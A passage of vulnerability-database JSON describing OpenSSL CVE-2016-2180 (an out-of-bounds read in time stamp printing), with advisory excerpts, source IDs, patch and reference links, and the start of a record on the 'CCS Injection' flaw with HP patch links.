is\ninsufficient memory to service the multiple requests. \n\nExcept in the instance of (1) above any Denial Of Service is likely to\nbe transitory because as soon as the connection fails the memory is\nsubsequently freed again in the SSL_free() call. However there is an\nincreased risk during this period of application crashes due to the lack\nof memory - which would then mean a more serious Denial of Service. \n\nThis issue does not affect TLS users. \n\nOpenSSL 1.1.0 DTLS users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nNote\n====\n\nAs per our previous announcements and our Release Strategy\n(https://www.openssl.org/policies/releasestrat.html), support for OpenSSL\nversion 1.0.1 will cease on 31st December 2016. No security updates for that\nversion will be provided after that date. Users of 1.0.1 are advised to\nupgrade. \n\nSupport for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those\nversions are no longer receiving security updates. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv/20160922.txt\n\nNote: the online version of the advisory may be updated with additional details\nover time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/policies/secpolicy.html\n", "sources": [ { "db": "NVD", "id": "CVE-2016-2180" }, { "db": "JVNDB", "id": "JVNDB-2016-004110" }, { "db": "BID", "id": "92117" }, { "db": "VULMON", "id": "CVE-2016-2180" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "169633" } ], "trust": 2.52 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-2180", "trust": 3.4 }, { "db": "BID", "id": "92117", "trust": 2.0 }, { "db": "SECTRACK", "id": "1036486", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2016-20", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2016-21", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2016-16", "trust": 1.7 }, { "db": "JUNIPER", "id": "JSA10759", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.7 }, { "db": "PULSESECURE", "id": "SA40312", "trust": 1.7 }, { "db": "JVN", "id": "JVNVU98667810", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-004110", "trust": 0.8 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201607-952", "trust": 0.6 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2016-2180", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138870", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138817", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140056", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138820", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138826", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169633", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2180" }, { "db": "BID", "id": "92117" }, { "db": "JVNDB", "id": "JVNDB-2016-004110" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "169633" }, { "db": "NVD", "id": "CVE-2016-2180" }, { "db": "CNNVD", "id": "CNNVD-201607-952" } ] }, "id": "VAR-201608-0006", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.3797576935714285 }, "last_update_date": "2023-12-18T11:04:13.313000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cisco-sa-20160927-openssl", "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160927-openssl" }, { "title": "Fix OOB read in TS_OBJ_print_bio().", "trust": 0.8, "url": "https://github.com/openssl/openssl/commit/0ed26acce328ec16a3aa635f1ca37365e8c7403a" }, { "title": "1995039", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995039" }, { "title": "NV17-001", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv17-001.html" }, { "title": "OpenSSL 1.0.1 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.1-notes.html" }, { "title": "OpenSSL 1.0.2 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.2-notes.html" }, { "title": "Oracle Critical Patch Update Advisory - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "title": "Oracle Linux Bulletin - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html" }, { "title": "Oracle VM Server for x86 Bulletin - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinoct2016-3090547.html" }, { "title": "Bug 1359615", "trust": 0.8, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1359615" }, { "title": "SA40312", "trust": 0.8, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40312" }, { "title": "SA132", "trust": 0.8, "url": "https://bto.bluecoat.com/security-advisory/sa132" }, { "title": "JSA10759", "trust": 0.8, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "title": "Splunk Enterprise 6.5.1 addresses multiple OpenSSL vulnerabilities", "trust": 0.8, "url": "http://www.splunk.com/view/sp-caaapsv" }, { "title": "Splunk Enterprise 6.4.5 addresses multiple vulnerabilities", "trust": 0.8, "url": "http://www.splunk.com/view/sp-caaapue" }, { "title": "TNS-2016-16", "trust": 0.8, "url": "https://www.tenable.com/security/tns-2016-16" }, { "title": "OpenSSL Fixes for local denial of service vulnerabilities", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=63306" }, { "title": "Red Hat: Important: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20161940 - security advisory" }, { "title": "Arch Linux Issues: ", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2016-2180" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3087-1" }, { "title": "Ubuntu Security Notice: openssl regression", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3087-2" }, { "title": "Amazon Linux AMI: ALAS-2016-755", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-755" }, { "title": "Arch Linux Advisories: [ASA-201609-24] lib32-openssl: multiple issues", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201609-24" }, { "title": "Arch Linux Advisories: [ASA-201609-23] openssl: multiple issues", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201609-23" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=69e9536e77203a3c76b24dd89f4f9300" }, { "title": "Forcepoint Security Advisories: CVE-2016-2180 to -2183, -6302 to -6309, -2179, -7052 OpenSSL Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories\u0026qid=a9dd8a175d084c7432b7ad47715ac50c" }, { "title": "Tenable Security Advisories: [R7] Nessus 6.9 Fixes Multiple Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-16" }, { "title": "Symantec Security Advisories: SA132 : OpenSSL Vulnerabilities 22-Sep-2016 and 26-Sep-2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=1e6dcaf5dac6ef96a7d917a8c1393040" }, { "title": "Cisco: Multiple Vulnerabilities in OpenSSL Affecting Cisco Products: September 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20160927-openssl" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=ac5af5dd99788925425f5747ec672707" }, { "title": "Tenable Security Advisories: [R2] LCE 4.8.2 Fixes Multiple Third-party Library Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-21" }, { "title": "Tenable Security Advisories: [R3] PVS 5.2.0 Fixes Multiple Third-party Library Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-20" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - July 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=586e6062440cdd312211d748e028164e" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=6839c4d3fd328571c675c335d58b5591" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=2f446a7e1ea263c0c3a365776c6713f2" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=a31bff03e9909229fd67996884614fdf" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=e2a7f287e9acc8c64ab3df71130bc64d" }, { "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=21c0efa2643d707e2f50a501209eb75c" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=13f3551b67d913fba90df4b2c0dae0bf" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4019ca77f50c7a34e4d97833e6f3321e" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "alpine-cvecheck", "trust": 0.1, "url": "https://github.com/tomwillfixit/alpine-cvecheck " }, { "title": "", "trust": 0.1, "url": "https://github.com/imhunterand/hackerone-publicy-disclosed " } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2180" }, { "db": "JVNDB", "id": "JVNDB-2016-004110" }, { "db": "CNNVD", "id": "CNNVD-201607-952" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-125", "trust": 1.0 }, { "problemtype": "CWE-Other", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-004110" }, { "db": "NVD", "id": "CVE-2016-2180" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.0, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1359615" }, { "trust": 2.0, "url": "https://github.com/openssl/openssl/commit/0ed26acce328ec16a3aa635f1ca37365e8c7403a" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995039" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "trust": 1.8, "url": "http://www.securityfocus.com/bid/92117" }, { "trust": 1.8, "url": "https://security.gentoo.org/glsa/201612-16" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2016-1940.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinoct2016-3090547.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html" }, { "trust": 1.7, "url": "http://www.splunk.com/view/sp-caaapue" }, { "trust": 1.7, "url": "http://www.splunk.com/view/sp-caaapsv" }, { "trust": 1.7, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40312" }, { "trust": 1.7, "url": "https://bto.bluecoat.com/security-advisory/sa132" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2016-16" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1036486" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2016-21" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2016-20" }, { "trust": 1.7, "url": "https://security.freebsd.org/advisories/freebsd-sa-16:26.openssl.asc" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html" }, { "trust": 1.7, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03856en_us" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 0.9, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160927-openssl" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2180" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu98667810/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-2180" }, { "trust": 0.8, "url": "http://www.bizmobile.co.jp/news_02.php?id=4069\u0026nc=1" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2178" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2177" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6306" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6304" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2180" }, { "trust": 0.6, "url": "https://www.openssl.org/news/vulnerabilities.html#y2017" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2182" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6302" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2179" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2181" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2183" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6303" }, { "trust": 0.3, "url": "https://github.com/openssl/openssl/commit/6adf409c7432b90c06d9890787fe56c48f2a16e7" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory21.asc" }, { "trust": 0.3, "url": "https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilities-in-openssl-affect-ibm-worklight-and-ibm-mobilefirst-platform-foundation-2/" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024394" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg3t1024401" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024648" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021643" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html" }, { "trust": 0.3, "url": "https://kc.mcafee.com/resources/sites/mcafee/content/live/product_documentation/27000/pd27128/en_us/meg_7_6_406_3402_103_release_notes_en_us.pdf" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995935" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21994870" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21991724" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992348" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992898" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993061" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993875" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995129" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995392" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995393" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995691" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000242" }, { "trust": 0.2, "url": "https://www.openssl.org/news/secadv/20160922.txt" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6305" }, { "trust": 0.2, "url": "http://www.ubuntu.com/usn/usn-3087-1" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/125.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2016:1940" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/3087-1/" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=49001" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2180" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-6306" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2177" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2181" }, { "trust": 0.1, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-6304" }, { "trust": 0.1, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2179" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2182" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-6302" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2178" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2107" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2109" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2106" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2105" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2183" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2107" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2178" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2176" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7052" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6304" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6305" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2108" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2106" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2108" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-7052" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2105" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2109" }, { "trust": 0.1, "url": "http://eprint.iacr.org/2016/594.pdf" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2176" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2180" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2177" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6306" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.37" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.20" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.4" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.21" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.38" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.5" }, { "trust": 0.1, "url": "https://launchpad.net/bugs/1626883" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-3087-2" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6308" }, { "trust": 0.1, "url": "https://www.openssl.org/policies/secpolicy.html" }, { "trust": 0.1, "url": "https://sweet32.info)" }, { "trust": 0.1, "url": "https://www.openssl.org/policies/releasestrat.html)," }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6307" } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2180" }, { "db": "BID", "id": "92117" }, { "db": "JVNDB", "id": "JVNDB-2016-004110" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "169633" }, { "db": "NVD", "id": "CVE-2016-2180" }, { "db": "CNNVD", "id": "CNNVD-201607-952" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2016-2180" }, { "db": "BID", "id": "92117" }, { "db": "JVNDB", "id": "JVNDB-2016-004110" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "169633" }, { "db": "NVD", "id": "CVE-2016-2180" }, { "db": "CNNVD", "id": "CNNVD-201607-952" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-08-01T00:00:00", "db": "VULMON", "id": "CVE-2016-2180" }, { "date": "2016-07-21T00:00:00", "db": "BID", "id": "92117" }, { "date": "2016-08-02T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-004110" }, { "date": "2016-09-27T19:32:00", "db": "PACKETSTORM", "id": "138870" }, { "date": "2016-09-22T22:22:00", "db": "PACKETSTORM", "id": "138817" }, { "date": "2016-12-07T16:37:31", "db": "PACKETSTORM", "id": "140056" }, { "date": "2016-09-22T22:25:00", "db": "PACKETSTORM", "id": "138820" }, { "date": "2016-09-23T19:19:00", "db": "PACKETSTORM", "id": "138826" }, { "date": "2016-09-22T12:12:12", "db": "PACKETSTORM", "id": "169633" }, { "date": "2016-08-01T02:59:11.120000", "db": "NVD", "id": "CVE-2016-2180" }, { "date": "2016-07-27T00:00:00", "db": "CNNVD", "id": "CNNVD-201607-952" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2022-12-13T00:00:00", "db": "VULMON", "id": "CVE-2016-2180" }, { "date": "2018-02-05T14:00:00", "db": "BID", "id": "92117" }, { "date": "2017-10-03T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-004110" }, { "date": "2022-12-13T12:15:22.070000", "db": "NVD", "id": "CVE-2016-2180" }, { "date": "2022-12-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201607-952" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "CNNVD", "id": "CNNVD-201607-952" } ], "trust": 0.9 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of X.509 Implementation of public key infrastructure time stamp protocol crypto/ts/ts_lib.c Service disruption in (DoS) Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-004110" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201607-952" } ], "trust": 0.6 } }
var-201406-0445
Vulnerability from variot
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCipherSpec messages, which allows man-in-the-middle attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL communications, and consequently hijack sessions or obtain sensitive information, via a crafted TLS handshake, aka the "CCS Injection" vulnerability. OpenSSL is prone to security-bypass vulnerability. Successfully exploiting this issue may allow attackers to obtain sensitive information by conducting a man-in-the-middle attack. This may lead to other attacks. Versions prior to OpenSSL 1.0.1 and 1.0.2-beta1 are vulnerable.
HP Connect IT / HP SPM CIT - 9.5x Please install: HP Connect IT 9.53.P2
For Windows http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00070
For Linux http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00071
For AIX http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00072
For HPUX http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00073
